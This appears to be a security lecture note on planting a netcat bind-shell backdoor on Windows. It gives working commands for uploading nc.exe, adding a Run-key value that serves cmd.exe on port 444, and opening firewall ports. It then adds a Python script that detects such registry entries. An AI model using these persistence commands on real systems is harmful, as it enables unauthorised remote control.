T3SEC - Lecture 8: nc backdoor

Hidden backdoor

1. Upload the nc backdoor

  • upload /root/nc.exe c:\\windows\\system32

2. Modify the registry

  • reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
  • reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\Windows\system32\nc.exe -Ldp 444 -e cmd.exe' // add the nc value
  • reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc // view it

3. Firewall: allow the port

  • execute -f cmd -i -H // spawn a shell
  • cmd: netsh firewall show opmode // show the firewall state
  • netsh firewall add portopening tcp 444 "textx" ENABLE ALL
  • netsh firewall add portopening TCP 4444 "FireWall" ENABLE ALL
  • netsh firewall add portopening TCP 7776 "QQ" ENABLE ALL
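
On the detection side, steps 2 and 3 leave two artifacts: a Run value whose command line starts a listener with `-e cmd.exe`, and firewall openings for the same port. The script below is an added example, not part of the original post; it triages constructed `reg query` output, and the sample data, function name and reason labels are assumptions.

```python
import re

# Constructed sample of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
# output (illustrative values, not taken from a real host).
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    C:\Windows\system32\nc.exe -Ldp 444 -e cmd.exe
    Updater    REG_SZ    "C:\Program Files\Vendor\updater.exe" /silent
"""
# Constructed: TCP ports found opened in the host firewall configuration.
SAMPLE_OPEN_PORTS = {444, 4444, 7776}

# reg.exe prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")
# Netcat-style binary name anywhere in the command line.
NETCAT = re.compile(r"(?:^|[\\/\s\"])(?:nc|ncat|netcat)(?:\.exe)?(?=[\s\"]|$)", re.I)
# Short-option cluster containing both l/L (listen) and p (port), then the port.
LISTEN = re.compile(r"(?:^|\s)-(?=[A-Za-z]*[lL])(?=[A-Za-z]*p)[A-Za-z]+\s+(\d{1,5})\b")
# -e handing the connection to a command interpreter.
SHELL = re.compile(r"(?:^|\s)-e\s+\S*(?:cmd|powershell)(?:\.exe)?\b", re.I)


def triage_run_key(reg_output, open_ports=frozenset()):
    """Return one finding per Run value that looks like a bind-shell listener."""
    findings = []
    for line in reg_output.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue  # key header or blank line
        name, _type, data = m.groups()
        reasons = []
        if NETCAT.search(data):
            reasons.append("netcat-binary")
        listen = LISTEN.search(data)
        if listen:
            reasons.append("listen-port")
        if SHELL.search(data):
            reasons.append("exec-shell")
        port = int(listen.group(1)) if listen else None
        if port is not None and port in open_ports:
            reasons.append("firewall-port-open")
        if reasons:
            findings.append({"value": name, "port": port, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage_run_key(SAMPLE_RUN_KEY, SAMPLE_OPEN_PORTS):
        print(finding)
```

A value that collects several reasons at once, as the `nc` entry does here, is a much stronger signal than any single match; a renamed binary still trips the `listen-port` and `exec-shell` checks.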